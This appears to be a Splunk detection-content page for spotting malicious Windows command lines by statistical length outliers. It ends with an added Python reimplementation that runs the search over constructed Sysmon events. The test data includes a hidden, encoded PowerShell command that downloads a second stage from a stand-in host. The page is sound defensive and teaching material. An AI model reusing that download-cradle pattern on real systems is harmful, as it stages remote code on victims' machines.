Malicious Command Line Executions

Description

Ransomware and other malware variants often execute long commands using command line arguments. This search performs statistical analysis of these CLI arguments to detect potentially malicious executions.


Use Case

Advanced Threat Detection

Category

Endpoint Compromise

Alert Volume

Medium

SPL Difficulty

Basic

Journey

Stage 3

MITRE ATT&CK Tactics

Execution
Defense Evasion

MITRE ATT&CK Techniques

Command-Line Interface
Scripting

MITRE Threat Groups

APT1
APT18
APT19
APT28
APT29
APT3
APT32
APT37
APT38
APT39
APT41
BRONZE BUTLER
Cobalt Group
Dark Caracal
Darkhotel
Deep Panda
Dragonfly 2.0
FIN10
FIN4
FIN5
FIN6
FIN7
FIN8
Gallmaker
Gamaredon Group
Gorgon Group
Honeybee
Ke3chang
Lazarus Group
Leafminer
Leviathan
Machete
Magic Hound
MuddyWater
OilRig
Patchwork
Rancor
Silence
Soft Cell
Sowbug
Stealth Falcon
Suckfly
TA459
TA505
Threat Group-1314
Threat Group-3390
Turla
WIRTE
admin@338
menuPass

Kill Chain Phases

Installation

Data Sources

Windows Security
Endpoint Detection and Response

How to Implement

To run this search you need to index Sysmon data from your Windows endpoints. However, you can modify the search to use data from other sources that capture command lines, such as endpoint products like Carbon Black, or Windows process creation events (Security event ID 4688). Process creation auditing is not enabled by default, but can be enabled via GPO; note that event 4688 only records the command line if the "Include command line in process creation events" policy is also enabled, otherwise the search has nothing to measure.

Known False Positives

None documented at the moment. Any statistical threshold on command-line length will, however, also flag legitimate processes that take unusually long arguments on a given host (Java applications, installers and management agents are common examples), so confirm the process image before escalating.

How To Respond

When this search fires, begin your standard incident response process by validating that the process is legitimate and that its command-line options are legitimate. Then investigate what actions the process took and verify each of them.

Help

Malicious Command Line Executions Help

SPL for Malicious Command Line Executions

Demo Data

First we pull in our demo dataset. This could be any EDR data source that provides the full command-line string.
Because we only care about process launches, we filter for EventCode 1, which is the Sysmon event ID for process creation.
Next we use eval to calculate the length of the command line (the image path plus its arguments).
Eventstats is like stats, but it appends the results to every event in your existing dataset, so this gives us the average and standard deviation of command-line length for each host.
Finally we use stats to roll up repeated launches of the same command line, giving us the length of that command line alongside the host's average and standard deviation, per host and per command line.
With that setup, we can find processes whose command lines are substantially longer than the host's average: more than ten standard deviations above it.

Live Data

First we pull in our basic dataset, which consists of XML-format Sysmon logs from the endpoints (ingested via the Sysmon TA). This could be any EDR data source that provides the full command-line string. Because we're looking for process launches, we then filter for EventCode=1 (the Sysmon process creation event).
Next we use eval to calculate the length of the command line (the image path plus its arguments).
Eventstats is like stats, but it appends the results to every event in your existing dataset, so this gives us the average and standard deviation of command-line length per host.
Finally we use stats to roll up repeated launches of the same command line, giving us its length alongside the host's average and standard deviation, per host and per command line.
With that setup, we can find processes whose command lines are substantially longer than the host's average: more than ten standard deviations above it.
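The pipeline described in the Demo Data and Live Data steps above, as an added example that is not code from the original page or from Splunk: the same filter, length calculation, per-host eventstats, per-command-line rollup and ten-standard-deviation test, re-implemented in Python over constructed Sysmon-style events so the arithmetic can be inspected offline. The SPL string at the top is a reconstruction from the step descriptions; the sourcetype and the Sysmon field names follow the Splunk Add-on for Sysmon, but the exact original search is an assumption. The hostnames, benign command lines and the encoded PowerShell payload are all constructed, and the example goes one step beyond the page by computing how many process launches a host must have before the rule can fire at all.

```python
"""Added example (not from the original page): the search's logic re-implemented in Python
over constructed Sysmon-style events, so the statistics behind the detection can be inspected."""
import base64
import math
import statistics
from collections import defaultdict

# Reconstructed from the step-by-step description on the page; the sourcetype and field names
# follow the Splunk Add-on for Sysmon, but the exact SPL of the original search is an assumption.
# Splunk's stdev() is the sample standard deviation, as is statistics.stdev() used below.
SPL = r"""
sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| eval cli_length=len(CommandLine)
| eventstats avg(cli_length) as avg_length, stdev(cli_length) as stdev_length by host
| stats count, max(cli_length) as cli_length, max(avg_length) as avg_length,
        max(stdev_length) as stdev_length by host, CommandLine
| where cli_length > avg_length + 10 * stdev_length
"""

# Constructed routine command lines (lengths 47, 25, 34 and 71 characters).
BENIGN = [
    r'"C:\Windows\System32\svchost.exe" -k netsvcs -p',
    r'"C:\Windows\explorer.exe"',
    r'C:\Windows\System32\cmd.exe /c dir',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer',
]

# Constructed placeholder for a long encoded PowerShell launch. The script body is repeated only to
# give the blob a realistic length (1699 characters in total); it is not a real malware sample.
_SCRIPT = "$w=New-Object Net.WebClient;$w.DownloadString('http://example.invalid/stage');" * 8
ENCODED_PS = "powershell.exe -nop -w hidden -enc " + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()


def make_events():
    """Constructed Sysmon-style events: a busy host, a quiet host, and one non-process event."""
    events = []
    for i in range(120):  # WS01: 120 routine launches plus one encoded PowerShell launch
        events.append({"host": "WS01", "EventCode": 1, "CommandLine": BENIGN[i % len(BENIGN)]})
    events.append({"host": "WS01", "EventCode": 1, "CommandLine": ENCODED_PS})
    for i in range(4):  # WS02: the same malicious launch among only five process creations
        events.append({"host": "WS02", "EventCode": 1, "CommandLine": BENIGN[i]})
    events.append({"host": "WS02", "EventCode": 1, "CommandLine": ENCODED_PS})
    events.append({"host": "WS01", "EventCode": 3, "CommandLine": ""})  # network event, must be dropped
    return events


EVENTS = make_events()


def detect(events, sigma=10.0):
    """Run the search logic over a list of event dicts and return the rows the where clause keeps."""
    launches = [e for e in events if e["EventCode"] == 1]          # EventCode=1 filter
    lengths = defaultdict(list)
    for e in launches:
        lengths[e["host"]].append(len(e["CommandLine"]))             # eval cli_length=len(CommandLine)
    baseline = {}                                                    # eventstats avg/stdev by host
    for host, vals in lengths.items():
        sd = statistics.stdev(vals) if len(vals) > 1 else 0.0        # a single event has no spread
        baseline[host] = (statistics.fmean(vals), sd)
    counts = defaultdict(int)                                        # stats count by host, CommandLine
    for e in launches:
        counts[(e["host"], e["CommandLine"])] += 1
    hits = []
    for (host, cli), count in sorted(counts.items()):
        avg, sd = baseline[host]
        if len(cli) > avg + sigma * sd:                              # where cli_length > avg + 10*stdev
            hits.append({"host": host, "CommandLine": cli, "count": count, "cli_length": len(cli),
                         "avg_length": round(avg, 1), "stdev_length": round(sd, 1)})
    return hits


def max_zscore(n):
    """Largest (x - avg) / stdev any one event can reach among n events on a host when that event is
    itself part of the eventstats population: n-1 identical lengths plus one outlier gives (n-1)/sqrt(n)."""
    return (n - 1) / math.sqrt(n) if n > 1 else 0.0


def min_events_to_fire(sigma=10.0):
    """Smallest per-host launch count at which any command line can exceed avg + sigma * stdev."""
    n = 2
    while max_zscore(n) <= sigma:
        n += 1
    return n


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
    print("launches needed per host before the 10-sigma rule can fire:", min_events_to_fire())
```

The quiet host never fires even though it ran the identical encoded command: because the outlier is included in its own baseline, a single event's distance from the host average is capped at (n-1)/sqrt(n) standard deviations, so with ten standard deviations the search needs at least 102 process launches from a host within the search window. When scheduling this search, either check per-host event counts or compute the baseline over a longer window than the events you are testing.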